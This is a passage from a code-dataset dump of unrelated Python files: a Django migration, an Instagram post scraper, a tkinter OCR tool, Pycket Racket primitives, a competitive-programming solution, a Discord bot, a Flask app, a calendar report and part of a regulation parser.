verbose_name='\\u4ea7\\u54c1\\u7ec4\\u5c5e\\u6027', to='catalogue.ProductAttribute', blank=True),\n        ),\n        migrations.AddField(\n            model_name='product',\n            name='product_group',\n            field=models.ForeignKey(related_name='product_group', verbose_name='\\u4ea7\\u54c1\\u7ec4', blank=True, to='catalogue.ProductGroup', null=True),\n        ),\n    ]\n","sub_path":"webapp/apps/catalogue/migrations/0003_auto_20160202_1639.py","file_name":"0003_auto_20160202_1639.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58891464","text":"\"\"\"\n    instagramy.InstagramPost\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n    This module scrapes Instagram Post data\n    for a given Instagram Post id.\n\n    Usage Example\n    -------------\n    ::\n\n        from instagramy.InstagramPost import InstagramPost\n\n        >>> post = InstagramPost('CGeYX2OA61s')\n        >>> post.author\n        >>> post.number_of_likes\n        >>> post.number_of_comments\n\n\"\"\"\n\nfrom .core.parser import ParsePost\nfrom .core.requests import get\nfrom .core.exceptions import PostIdNotFound, HTTPError\n\n\nclass InstagramPost:\n    \"\"\"\n    Class InstagramPost scrapes the post information\n    for a given post id (from the url of the post)\n    `https://www.instagram.com/p/<post_id>/`\n    `https://www.instagram.com/p/CGeYX2OA61s/`\n\n    >>> post = InstagramPost(\"CGeYX2OA61s\")\n    >>> post.author\n    '@virat.kohli'\n    >>> post.number_of_likes\n    2203830\n    >>> post.number_of_comments\n    4629\n    \"\"\"\n\n    def __init__(self, post_id: str):\n        self.post_id = post_id\n        self.url = f\"https://www.instagram.com/p/{post_id}/\"\n        self.post_details = self.post_detail()\n\n    def post_detail(self) -> dict:\n        \"\"\"\n        Return a dict of Post information\n        \"\"\"\n\n        try:\n            html = get(self.url)\n        except HTTPError:\n            raise PostIdNotFound(self.post_id)\n        parser = ParsePost()\n        parser.feed(html)\n        info = parser.Data\n        post_details = {}\n        try:\n            post_details[\"caption\"] = info[\"caption\"]\n        except (KeyError, TypeError):\n            post_details[\"caption\"] = None\n        try:\n            post_details[\"uploaddate\"] = info[\"uploadDate\"]\n        except (KeyError, TypeError):\n            post_details[\"uploaddate\"] = None\n        try:\n            post_details[\"author\"] = info[\"author\"][\"alternateName\"]\n        except (KeyError, TypeError):\n            post_details[\"author\"] = None\n        try:\n            post_details[\"profile_page_url\"] = info[\"author\"][\"mainEntityofPage\"][\"@id\"]\n        except (KeyError, TypeError):\n            
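# any key missing from the parsed JSON-LD simply falls back to None\n            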
post_details[\"profile_page_url\"] = None\n        try:\n            post_details[\"likes\"] = info[\"interactionStatistic\"][\"userInteractionCount\"]\n        except (KeyError, TypeError):\n            post_details[\"likes\"] = None\n        try:\n            post_details[\"comments\"] = info[\"commentCount\"]\n        except (KeyError, TypeError):\n            post_details[\"comments\"] = None\n        try:\n            post_details[\"description\"] = info[\"description\"]\n        except (KeyError, TypeError):\n            post_details[\"description\"] = None\n\n        return post_details\n\n    @property\n    def number_of_likes(self) -> int:\n        \"\"\" No. of likes on the given post \"\"\"\n        return int(self.post_details[\"likes\"])\n\n    @property\n    def number_of_comments(self) -> int:\n        \"\"\" No. of comments on the given post \"\"\"\n        return int(self.post_details[\"comments\"])\n\n    @property\n    def author(self) -> str:\n        \"\"\" Author of the Post \"\"\"\n        return self.post_details[\"author\"]\n\n    @property\n    def caption(self) -> str:\n        \"\"\" Caption of the Post \"\"\"\n        return self.post_details[\"caption\"]\n\n    @property\n    def description(self) -> str:\n        \"\"\" Description of the Post given by Instagram \"\"\"\n        return self.post_details[\"description\"]\n\n    def __repr__(self) -> str:\n        return f\"{self.__class__.__name__}('{self.post_id}')\"\n\n    def __str__(self) -> str:\n        return f\"Post ({self.post_id}) posted by {self.author} with {self.number_of_likes} likes\"\n","sub_path":"instagramy/InstagramPost.py","file_name":"InstagramPost.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"133725935","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import filedialog,Text\r\nfrom PIL import Image,ImageTk\r\nimport cv2\r\nimport numpy as np\r\nimport pytesseract as pt\r\nfrom pytesseract import Output\r\n\r\nimg=np.zeros((),np.uint8)\r\nnew_img=np.zeros((),np.uint8)\r\ntext=''\r\ncounter=0\r\n\r\nroot=tk.Tk()\r\ncanvas=tk.Canvas(root,height=700,width=700,bg='#00FFFF')\r\ncanvas.pack()\r\nframe=tk.Frame(root,bg='black')\r\nframe.place(relwidth=0.6,relheight=0.8,relx=0.2,rely=0.05)\r\ntext_box=tk.Frame(frame,bg='#FAEBD7')\r\ntext_box.place(relwidth=0.6,relheight=0.6,relx=0.2,rely=0.2)\r\n\r\ndef open_button_click():\r\n    filename = filedialog.askopenfilename(initialdir = '/Users/Desktop/',title = 'Select an Image',filetypes = (('JPG','*.jpg'),('All files','*.*')))\r\n    print(filename)\r\n    global img,new_img\r\n    img = cv2.imread(filename)\r\n    print(img.shape)\r\n    img=cv2.resize(img,(700,700))\r\n    new_img=img.copy()\r\n    cv2.imshow('frame',img)\r\n    cv2.waitKey(0)\r\n\r\ndef blur_button_click():\r\n    global new_img,img\r\n    img_gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n    kernel=np.ones((2,2))\r\n    gaussian_blur=cv2.GaussianBlur(img_gray,(5,5),2)\r\n    new_img=gaussian_blur.copy()\r\n    cv2.imshow('frame',gaussian_blur)\r\n\r\ndef auto_button_click():\r\n    global new_img,img\r\n    image=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n    kernel=np.ones((5,5))\r\n    gaussian_blur=cv2.GaussianBlur(image,(5,5),2)\r\n    edge=cv2.Canny(gaussian_blur,40,280)\r\n    contours,hierarchy=cv2.findContours(edge,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n    areas=[cv2.contourArea(c) for c in contours]\r\n    max_index=np.argmax(areas)\r\n    max_contour=contours[max_index]\r\n    perimeter=cv2.arcLength(max_contour,True)\r\n    ROI=cv2.approxPolyDP(max_contour,0.01*perimeter,True)\r\n    cv2.drawContours(img,[ROI],-1,(0,255,0),2)\r\n    pts_1=np.array([ROI[0],ROI[1],ROI[3],ROI[2]],np.float32)\r\n    pts_2=np.array([(0,0),(500,0),(0,500),(500,500)],np.float32)\r\n    
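# warp the four detected corners onto a 500x500 top-down view\r\n    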
perspective=cv2.getPerspectiveTransform(pts_1,pts_2)\r\n    transformed=cv2.warpPerspective(img,perspective,(500,500))\r\n    cv2.imshow('output',transformed)\r\n\r\ndef manual_button_click():\r\n    pts=[]\r\n    def mouse(event,x,y,flags,param):\r\n        global new_img,img\r\n        if event==cv2.EVENT_LBUTTONDOWN:\r\n            pts.append((x,y))\r\n        if len(pts)==4:\r\n            warp(pts)\r\n    def warp(pts):\r\n        global new_img,img\r\n        pts_1=np.array([pts[0],pts[1],pts[3],pts[2]],np.float32)\r\n        pts_2=np.array([(0,0),(500,0),(0,500),(500,500)],np.float32)\r\n        perspective=cv2.getPerspectiveTransform(pts_1,pts_2)\r\n        transformed=cv2.warpPerspective(img,perspective,(500,500))\r\n        new_img=transformed.copy()\r\n        cv2.imshow('frame',transformed)\r\n    cv2.namedWindow('frame')\r\n    cv2.setMouseCallback('frame',mouse)\r\n\r\n\r\n\r\ndef ocr_button_click():\r\n    \r\n    global new_img,text\r\n    ret,global_thresh=cv2.threshold(new_img,170,255,cv2.THRESH_BINARY)\r\n    text = pt.image_to_string(global_thresh,lang= 'eng')\r\n    data = pt.image_to_data(global_thresh,output_type= Output.DICT)\r\n    no_word = len(data['text'])\r\n    for i in range(no_word):\r\n        if int(data['conf'][i]) > 50:\r\n            x,y,w,h = data['left'][i],data['top'][i],data['width'][i],data['height'][i]\r\n            cv2.rectangle(global_thresh,(x,y),(x+w,y+h),(0,255,0),2)\r\n            cv2.imshow('frame',global_thresh)\r\n            cv2.waitKey(200)\r\n    new_img=global_thresh.copy()\r\n\r\n\r\ndef show_button_click():\r\n    global text\r\n    textbox = tk.Frame(frame,bg = '#FDFFD6')\r\n    textbox.place(relx = 0.2,rely = 0.2,relwidth =0.6,relheight =0.6)\r\n    text_frame = Text(textbox,bg = '#FDFFD6')\r\n    text_frame.insert('1.0',text)\r\n    text_frame.pack()\r\n\r\ndef save_button_click():\r\n    global counter\r\n    global new_img\r\n    counter+=1\r\n    cv2.imwrite('image_'+str(counter) + '.jpg', new_img) \r\n\r\ndef original_img_button_click():\r\n    global new_img\r\n    new_img=img.copy()\r\n    cv2.imshow('frame',img)\r\n\r\ndef flip_button_click():\r\n    global new_img\r\n    flipped=cv2.flip(new_img,1)\r\n    cv2.imshow('frame',flipped)\r\n\r\ndef rotate_button_click():\r\n    global new_img\r\n    rotate=cv2.rotate(new_img,cv2.ROTATE_90_CLOCKWISE)\r\n    cv2.imshow('frame',rotate)\r\n\r\n\r\ndef destroy_button_click():\r\n    cv2.destroyAllWindows()\r\n\r\nlabel=tk.Label(frame,text='TEXT DETECTED',fg='black',bg='white',font=('Bold',16))\r\nlabel.place(relx=0.3,rely=0.1)\r\n\r\nopenfile = tk.Button(canvas,text = 'Open Image',fg = '#000000',padx = 5,pady = 5, command = open_button_click)\r\nopenfile.place(relx=0.04,rely=0.1)\r\n\r\nblurimage=tk.Button(canvas,text='Blur Image',fg = '#000000',padx = 5,pady = 5, command = blur_button_click)\r\nblurimage.place(relx=0.038,rely=0.2)\r\n\r\nautocrop=tk.Button(canvas,text='Auto Crop',fg = '#000000',padx = 5,pady = 5, command = auto_button_click)\r\nautocrop.place(relx=0.038,rely=0.3)\r\n\r\nmanualcrop=tk.Button(canvas,text='Manual Crop',fg = '#000000',padx = 5,pady = 5, command = manual_button_click)\r\nmanualcrop.place(relx=0.035,rely=0.4)\r\n\r\nocrbutton=tk.Button(canvas,text='OCR',fg = '#000000',padx = 20,pady = 5, command = ocr_button_click)\r\nocrbutton.place(relx=0.85,rely=0.1)\r\n\r\nshowtext=tk.Button(canvas,text='Show text',fg = '#000000',padx = 5,pady = 5, command = show_button_click)\r\nshowtext.place(relx=0.85,rely=0.2)\r\n\r\nsaveimage=tk.Button(canvas,text='Save Image',fg = '#000000',padx = 5,pady = 5, command = save_button_click)\r\nsaveimage.place(relx=0.85,rely=0.3)\r\n\r\nshoworiginal=tk.Button(canvas,text='Original Image',fg = '#000000',padx = 5,pady = 5, command = 
original_img_button_click)\r\nshoworiginal.place(relx=0.83,rely=0.4)\r\n\r\nflipimage=tk.Button(canvas,text='Flip Image',fg = '#000000',padx = 5,pady = 5, command = flip_button_click)\r\nflipimage.place(relx=0.037,rely=0.5)\r\n\r\nrotateimage=tk.Button(canvas,text='Rotate Image',fg = '#000000',padx = 5,pady = 5, command = rotate_button_click)\r\nrotateimage.place(relx=0.84,rely=0.5)\r\n\r\ndestroywindow=tk.Button(canvas,text='Close windows',fg = '#000000',padx = 8,pady = 8, command = destroy_button_click)\r\ndestroywindow.place(relx=0.4,rely=0.88)\r\n\r\nroot.mainloop()","sub_path":"miniproject/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651839074","text":"\nfrom pycket import values\nfrom pycket import values_parameter\nfrom pycket.base import W_Object\nfrom pycket.error import SchemeException\nfrom pycket.prims.expose import expose, expose_val, default, procedure\n\n@expose(\"make-parameter\",\n [values.W_Object, default(values.W_Object, values.w_false)])\ndef make_parameter(init, guard):\n return values_parameter.W_Parameter(init, guard)\n\n@expose(\"make-derived-parameter\",\n [values_parameter.W_BaseParameter, procedure, procedure])\ndef make_derived_parameter(param, guard, wrap):\n return values_parameter.W_DerivedParameter(param, guard, wrap)\n\n@expose(\"extend-parameterization\",\n [values.W_Object, values.W_Object, values.W_Object])\ndef extend_paramz(paramz, key, val):\n if not isinstance(key, values_parameter.W_BaseParameter):\n raise SchemeException(\"Not a parameter: \" + key.tostring())\n if isinstance(paramz, values_parameter.W_Parameterization):\n return paramz.extend([key], [val])\n else:\n return paramz # This really is the Racket behavior\n\ndef call_with_parameterization(f, args, paramz, env, cont):\n cont.update_cm(values.parameterization_key, paramz)\n return f.call(args, env, cont)\n\n@expose(\"call-with-parameterization\",\n [values.W_Object, values_parameter.W_Parameterization], simple=False)\ndef call_w_paramz(f, paramz, env, cont):\n return call_with_parameterization(f, [], paramz, env, cont)\n\ndef call_with_extended_paramz(f, args, keys, vals, env, cont):\n from pycket.values import parameterization_key\n # XXX seems untested?\n paramz = cont.get_mark_first(parameterization_key)\n assert isinstance(paramz, values_parameter.W_Parameterization) # XXX is this always right?\n paramz_new = paramz.extend(keys, vals)\n return call_with_parameterization(f, args, paramz_new, env, cont)\n\n\nexpose_val(\"parameterization-key\", values.parameterization_key)\nexpose_val(\"print-mpair-curly-braces\", values_parameter.W_Parameter(values.w_false))\nexpose_val(\"print-pair-curly-braces\", values_parameter.W_Parameter(values.w_false))\n\n","sub_path":"pycket/prims/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552376260","text":"import sys\ninput = sys.stdin.readline\nfrom operator import itemgetter\nsys.setrecursionlimit(10000000)\nINF = 10**30\nimport heapq\n\ndef main():\n s = input().strip()\n n = len(s)\n stq = set()\n k = int(input().strip())\n for i in range(n):\n for j in range(i+1, min(i+1+k+1, n+1)):\n stq.add(s[i:j])\n stq = list(stq)\n heapq.heapify(stq)\n for i in range(k):\n ans = heapq.heappop(stq)\n if i == k-1:\n print(ans)\n\nif __name__ == '__main__':\n 
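# read S and K from stdin and print the K-th smallest distinct substring\n    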
main()\n","sub_path":"abc97-c.py","file_name":"abc97-c.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309196774","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime\nfrom cogs.utils.tf.SakuModel import SakuModel\nimport logging\n\n# Extensions to load into BubuBot:\nBASE_EXTENSIONS = (\n 'cogs.BaseCommands',\n 'cogs.Clear',\n 'cogs.Shadowverse',\n 'cogs.Emotes',\n 'cogs.Move',\n 'cogs.Voice',\n 'cogs.Games')\n\n\nclass BubuBot(commands.Bot):\n\n def __init__(self, *args, **kwargs):\n '''Initializes a BubuBot object'''\n # Bot parameters:\n self.login_time = None # To be updated on ready\n self.owner_id = None\n self.SakuModel = None\n self.DEBUG_MODE = kwargs.pop('DEBUG_MODE', False)\n self.DATABASE_URL = kwargs.pop('DATABASE_URL', None)\n self.NO_HEROKU = kwargs.pop('NO_HEROKU', False)\n extensions = kwargs.pop('extensions', BASE_EXTENSIONS)\n self.logger = self.set_logger(self.DEBUG_MODE)\n\n super().__init__(*args, **kwargs)\n \n # Loading the cogs:\n for extension in extensions:\n try:\n self.load_extension(extension)\n except Exception as err:\n self.logger.exception('Failed to load {}'.format(extension))\n\n # Base events:\n @self.event\n async def on_ready():\n # Grabbing the bot's app info:\n # *this needs to be saved in a variable or you can't access its content\n app_info = await self.application_info() # returns a namedtuple\n \n # Setting up some bot attributes:\n self.owner_id = app_info.owner.id\n self.login_time = datetime.now()\n await self.change_presence(game=discord.Game(name='waga na wa bubu'))\n self.SakuModel = SakuModel('cogs/utils/tf/retrained_labels.txt', 'cogs/utils/tf/retrained_graph.pb')\n # Login log messages:\n print('Logged in as')\n print(self.user.name)\n print(self.user.id)\n print('OwnerID: {}'.format(self.owner_id))\n print('------')\n\n @self.event\n async def on_command_error(err, ctx):\n channel = ctx.message.channel\n if isinstance(err, commands.CheckFailure):\n await self.send_message(channel, content=\"Insufficient permissions\")\n elif isinstance(err, commands.CommandNotFound):\n await self.send_message(channel, content=\"Not a command\")\n elif isinstance(err, commands.CommandOnCooldown):\n await self.send_message(channel, content=\"{} Chillax my dude\".format(ctx.message.author.mention))\n else:\n self.logger.exception(\"Unexpected error: {}--{}--{}\".format(err, ctx.message.content, channel))\n await self.send_message(channel, content=\"Something bad happened\")\n\n @staticmethod\n def set_logger(DEBUG_MODE=False):\n \"\"\"Create a logger on debug mode or info mode\"\"\"\n if DEBUG_MODE:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logger = logging.getLogger(__name__)\n logger.setLevel(level)\n\n bot_format = logging.Formatter(\n '%(asctime)s %(levelname)s %(module)s %(funcName)s %(lineno)d: '\n '%(message)s',\n datefmt=\"[%d/%m/%Y %H:%M]\")\n\n # Create a handler that prints to stdout:\n stdout_handler = logging.StreamHandler()\n stdout_handler.setFormatter(bot_format)\n stdout_handler.setLevel(level)\n\n logger.addHandler(stdout_handler)\n\n return logger\n","sub_path":"BubuBot.py","file_name":"BubuBot.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309624604","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/7/30 11:57\n# @Author : ShaoJK\n# @File : app.py\n# @Remark :\n\n\nfrom flask import 
Flask\n\nfrom views import inventory, purchase\nfrom modules import db\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///LiteDB.db'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True # commit automatically on teardown\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\ndb.init_app(app)\n\napp.register_blueprint(inventory)\napp.register_blueprint(purchase)\n\nwith app.app_context():\n    db.create_all()\n\n@app.route('/')\ndef hello_world():\n    return 'Hello, World!'\n\n\n\nif __name__ == '__main__':\n    app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"552376260","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom calendar import *\nfrom globals import globals\n\n\ndef GetPublicHolidays(FromDate,ToDate):\n    days = []\n    query = Query()\n    query.sql = \"SELECT {Date} FROM [PublicHoliday]\"\n    query.sql += \" WHERE?AND {Date}>=d|%s|\" % FromDate\n    query.sql += \" WHERE?AND {Date}<=d|%s|\" % ToDate\n    if (query.open()):\n        for dates in query:\n            days.append(dates.Date.day)\n    return days\n\nPersonBGColors = [\"#FFEEDD\", \"#EDFEDF\", \"#EABFDE\", \"#FFEEDE\",\"#FFEBB\",\"#EEAADF\"]\nclass ShowCalendar(Report): \n\n    def run(self):\n        if (not self.__dict__.has_key(\"SchedLoaded\")):\n            self.ShowMonth = True\n            self.ShowWeek = False\n            self.ShowDay = False\n            self.SchedLoaded = False\n            self.monthCalendar = {}\n            self.WeekNr = {}\n            self.BlueDays = [] \n            self.getView().resize(460,615)\n        \n        self.record = self.getRecord()\n        self.Persons = self.record.Users.replace(' ','').split(\",\")\n        self.showActions()\n        if(self.ShowMonth): self.DisplayMonthlyCalendar()\n        if(self.ShowWeek): self.DisplayWeeklyCalendar()\n        if(self.ShowDay): self.DisplayDailyCalendar()\n        \n    def showActions(self):\n        self.startTable()\n        self.startRow()\n        self.addValue(tr(\"Create Activity\"), CallMethod=\"createActivity\")\n        self.endRow()\n        self.endTable()\n        \n    def createActivity(self,value):\n        from Activity import Activity\n        from ActivityWindow import ActivityWindow\n        act = Activity()\n        act.defaults()\n        act.Users = self.record.Users\n        actwindow = ActivityWindow()\n        actwindow.setRecord(act)\n        actwindow.open()\n        \n    def DisplayMonthlyCalendar(self):\n        self.startTable(Border=\"1\")\n        self.startHeaderRow()\n        self.addValue(\"%s %s %i\" % (globals.MonthNames[self.record.Date.month], tr(\"of\"), self.record.Date.year), ColSpan=\"8\")\n        self.endHeaderRow()\n        self.startHeaderRow()\n        self.addValue(tr(\"Week\"))\n        self.loadMonthCalendar()\n        for day in globals.DayNames:\n            self.addValue(day)\n        self.endHeaderRow()\n        RedDays = GetPublicHolidays(StartOfMonth(self.record.Date),EndOfMonth(self.record.Date))\n        weeknr = StartOfMonth(self.record.Date).isocalendar()[1]\n        weekday = 0\n        MonthGrid = monthcalendar(self.record.Date.year,self.record.Date.month)\n        for row in MonthGrid:\n            self.startRow()\n            if row[0]: \n                self.WeekNr[weeknr] = date(self.record.Date.year,self.record.Date.month,row[0])\n            else:\n                self.WeekNr[weeknr] = date(self.record.Date.year,self.record.Date.month,row[6])\n            self.addValue(weeknr, CallMethod=\"bringWeek\")\n            for daynr in row:\n                BGround = \"White\"\n                FGround = \"Black\"\n                if (daynr == 0): \n                    daystr = \"\"\n                else:\n                    daystr = daynr\n                if (daynr==self.record.Date.day): BGround=\"Gray\"\n                if weekday in (5,6) or (daynr in RedDays): FGround=\"Red\"\n                if self.monthCalendar.has_key(daynr): FGround = \"blue\"\n                self.addValue(daystr, BGColor=BGround, Color=FGround, CallMethod=\"bringDay\")\n                
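# advance to the next weekday column (wraps back to Monday)\n                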
weekday = (weekday + 1) % 7\n self.endRow()\n weeknr += 1\n \n self.endTable()\n self.startTable() \n self.startHeaderRow()\n self.addValue(tr(\"Previous\"), CallMethod=\"move\", Parameter=\"000\")\n self.addValue(tr(\"Next\"), CallMethod=\"move\", Parameter=\"001\")\n self.endHeaderRow()\n self.endTable()\n \n def DisplayWeeklyCalendar(self):\n self.addHTML(\"
\")\n        self.startTable(Border=\"1\")\n        self.startRow()\n        self.endRow()\n        self.startHeaderRow()\n        udate = addDays(self.record.Date, 6)\n        self.addValue(tr(\"Close\"), CallMethod=\"closeWeek\")\n        self.addValue(\"%s %i %s %s %s %i %s %i %s %s %s %s\" % (tr(\"Week from\"),self.record.Date.day,tr(\"of\"), globals.MonthNames[self.record.Date.month], tr(\"of\"),self.record.Date.year,tr(\"To\"), udate.day,tr(\"of\"), globals.MonthNames[udate.month],tr(\"of\"), udate.year), ColSpan=\"7\", CallMethod=\"closeWeek\")\n        self.endHeaderRow()\n        self.startHeaderRow()\n        self.addValue(\"\")\n        idate = self.record.Date\n        sched = {}\n        for i in range(0,7):\n            query = Query()\n            query.sql = \"SELECT * FROM [Activity] WHERE {StartDate}<=d|%s| AND {EndDate}>=d|%s|\" % (str(idate), str(idate))\n            if query.open():\n                if (query.count()):\n                    for rec in query:\n                        sched[idate.day] = rec\n                else:\n                    sched[idate.day] = None\n                query.close()\n            self.addValue(idate.day, CallMethod=\"bringDay\")\n            idate = addDays(idate,1)\n        self.endHeaderRow()\n        self.startHeaderRow()\n        self.addValue(tr(\"Hour\"))\n        for day in globals.DayNames:\n            self.addValue(day)\n        self.endHeaderRow()\n        for t in range(7,20):\n            self.startRow()\n            self.addValue(\"%d:00\" % t)\n            i = self.record.Date.day\n            for day in globals.DayNames:\n                BG=\"white\"\n                DaysNr = monthrange(self.record.Date.year, self.record.Date.month)[1]\n                if ((i <= DaysNr) and (sched[i])):\n                    Schedule = sched[i]\n                    if ((time(t,0,0) >= Schedule.StartTime) and (time(t,0,0) <= Schedule.EndTime)):\n                        BG=\"red\"\n                self.addValue(\"\", BGColor=BG)\n                i += 1\n            self.endRow()\n        \n        self.endTable()\n        self.startTable()\n        self.startHeaderRow()\n        self.addValue(tr(\"Previous\"), CallMethod=\"move\", Parameter=\"010\")\n        self.addValue(tr(\"Next\"), CallMethod=\"move\", Parameter=\"011\")\n        self.endHeaderRow()\n        self.endTable()\n        \n    def getPreparedDailySched(self):\n        query = Query()\n        query.sql = \"SELECT * FROM [Activity]\"\n        query.sql += \" WHERE?AND {EndDate} >= d|%s|\" % self.record.Date\n        query.sql += \" WHERE?AND {StartDate} <= d|%s|\" % self.record.Date\n        query.sql += \" WHERE?AND (\";\n        OR = \"\"\n        for person in self.Persons:\n            query.sql += OR + \" {Users} LIKE s|%s|\" % (\"%\" + person + \"%\")\n            OR = \"OR\"\n        query.sql += \")\"; \n        query.sql += \" ORDER BY {StartTime}\"\n        \n        sched = {}\n        for h in range(8,20):\n            sched[h] = {}\n            for m in range(0,60,10):\n                sched[h][m] = {}\n        \n        if query.open():\n            for act in query:\n                for person in self.Persons:\n                    if act.Users.find(person) >= 0:\n                        st = act.StartTime\n                        et = act.EndTime\n                        mn = st.minute\n                        if (mn % 10) > 0: mn = mn - (mn % 10)\n                        rows = int(((et.hour * 60 + et.minute) - (st.hour * 60 + st.minute)) / 10)\n                        sched[act.StartTime.hour][mn][person] = {\"internalId\": act.internalId, \"Comment\": act.Comment, \"Rows\": rows}\n        query.close()\n        return sched\n    \n    def DisplayDailyCalendar(self):\n        self.addHTML(\"
\")\n self.startTable(Border=\"2\")\n self.startHeaderRow()\n self.addValue(tr(\"Close\"), CallMethod=\"closeDay\")\n self.addValue(\"%i %s %s %s %i\" % (self.record.Date.day,tr(\"of\"), globals.MonthNames[self.record.Date.month],tr(\"of\"), self.record.Date.year), Width=\"50px\", ColSpan=len(self.Persons))\n self.endHeaderRow()\n self.startHeaderRow()\n self.addValue(tr(\"Hour\"))\n personsAvoidRow = {}\n for person in self.Persons:\n self.addValue(person, Width=\"50px\")\n personsAvoidRow[person] = 0\n self.endHeaderRow()\n\n sched = self.getPreparedDailySched()\n for h in range(8,20):\n self.startRow()\n self.addValue(\"%d:00\" % h, RowSpan=6)\n sr = False\n for m in range(0,60,10):\n pnr = 0\n if sr: self.startRow()\n sr = True\n for person in self.Persons:\n #self.addValue(personsAvoidRow[person])\n if personsAvoidRow[person] > 0:\n personsAvoidRow[person] = personsAvoidRow[person] - 1 \n elif sched[h][m].has_key(person):\n act = sched[h][m][person]\n self.addValue(act[\"Comment\"], CallMethod=\"openActivity\", Parameter=str(act[\"internalId\"]), RowSpan=act[\"Rows\"], BGColor=PersonBGColors[pnr], Width=\"50px\")\n personsAvoidRow[person] = act[\"Rows\"] - 1\n elif len(sched[h][m]):\n self.addValue(\"\", Border=0)\n pnr += 1\n self.endRow()\n \n self.endTable()\n self.startTable()\n self.startHeaderRow()\n self.addValue(tr(\"Previous\"), CallMethod=\"move\", Parameter=\"100\")\n self.addValue(tr(\"Next\"), CallMethod=\"move\", Parameter=\"101\")\n self.endHeaderRow()\n self.endTable()\n \n def loadMonthCalendar(self):\n \n query = Query()\n query.sql = \"SELECT {internalId}, {StartDate}, {EndDate} FROM [Activity]\"\n query.sql += \" WHERE?AND {EndDate} >= d|%s|\" % StartOfMonth(self.record.Date)\n query.sql += \" WHERE?AND {StartDate} <= d|%s|\" % EndOfMonth(self.record.Date)\n query.sql += \" WHERE?AND (\";\n OR = \"\"\n for person in self.Persons:\n query.sql += OR + \" {Users} LIKE s|%s|\" % (\"%\" + person + \"%\")\n OR = \"OR\"\n query.sql += \")\"; \n\n daysInMonth = monthrange(self.record.Date.year, self.record.Date.month)[1]\n self.monthCalendar.clear()\n if query.open():\n for rec in query:\n date = rec.StartDate\n for day in range(rec.StartDate.day, rec.EndDate.day+1):\n if day > daysInMonth: break\n if not self.monthCalendar.has_key(day):\n self.monthCalendar[day] = [rec.internalId]\n else:\n self.monthCalendar[day].append(rec.internalId)\n \n def openActivity(self, param, value):\n from Activity import Activity\n from ActivityWindow import ActivityWindow\n activity = Activity()\n activity.internalId = int(param)\n if (activity.load()):\n actwindow = ActivityWindow()\n actwindow.setRecord(activity)\n actwindow.open()\n \n def bringMonth(self, value):\n self.clear()\n self.ShowMonth = True\n self.run()\n self.render()\n \n def bringWeek(self, value):\n self.clear()\n self.record.Date = StartOfWeek(self.WeekNr[int(value)])\n self.ShowWeek = True\n self.run()\n self.render()\n \n def closeWeek(self, value):\n self.clear()\n self.ShowWeek = False\n self.run()\n self.render() \n \n def bringDay(self, value):\n self.clear()\n self.record.Date = datetime(self.record.Date.year, self.record.Date.month, int(value))\n self.ShowDay = True\n self.run()\n self.render()\n \n def closeDay(self, value):\n self.clear()\n self.ShowDay = False\n self.run()\n self.render() \n \n def move(self, param, value):\n self.clear()\n self.SchedLoaded = False\n if (param == \"000\"):\n self.record.Date = addMonths(self.record.Date, -1)\n elif (param == \"001\"):\n self.record.Date = 
addMonths(self.record.Date, 1)\n elif (param == \"010\"):\n self.record.Date = addDays(self.record.Date, -7)\n elif (param == \"011\"):\n self.record.Date = addDays(self.record.Date, 7)\n elif (param == \"100\"):\n self.record.Date = addDays(self.record.Date, -1)\n elif (param == \"101\"):\n self.record.Date = addDays(self.record.Date, 1)\n self.run()\n self.render()\n \n \n","sub_path":"standard/reports/ShowCalendar.py","file_name":"ShowCalendar.py","file_ext":"py","file_size_in_byte":12304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"501025520","text":"#vim: set encoding=utf-8\nimport re\nimport logging\n\nfrom lxml import etree\n\nfrom regparser import content\nfrom regparser.tree.struct import Node\nfrom regparser.tree.paragraph import p_level_of, p_levels\nfrom regparser.tree.xml_parser.appendices import build_non_reg_text\nfrom regparser.tree import reg_text\nfrom regparser.tree.xml_parser import tree_utils\n\n\ndef determine_level(c, current_level, next_marker=None):\n \"\"\" Regulation paragraphs are hierarchical. This determines which level\n the paragraph is at. Convert between p_level indexing and depth here by\n adding one\"\"\"\n potential = p_level_of(c)\n\n if len(potential) > 1 and next_marker: # resolve ambiguity\n following = p_level_of(next_marker)\n\n # Add character index\n potential = [(level, p_levels[level].index(c)) for level in potential]\n following = [(level, p_levels[level].index(next_marker))\n for level in following]\n\n # Check if we can be certain using the following marker\n for pot_level, pot_idx in potential:\n for next_level, next_idx in following:\n if ( # E.g. i followed by A or i followed by 1\n (next_idx == 0 and next_level == pot_level + 1)\n or # E.g. i followed by ii\n (next_level == pot_level and next_idx > pot_idx)\n or # E.g. i followed by 3\n (next_level < pot_level and next_idx > 0)):\n return pot_level + 1\n logging.warning(\"Ambiguous marker 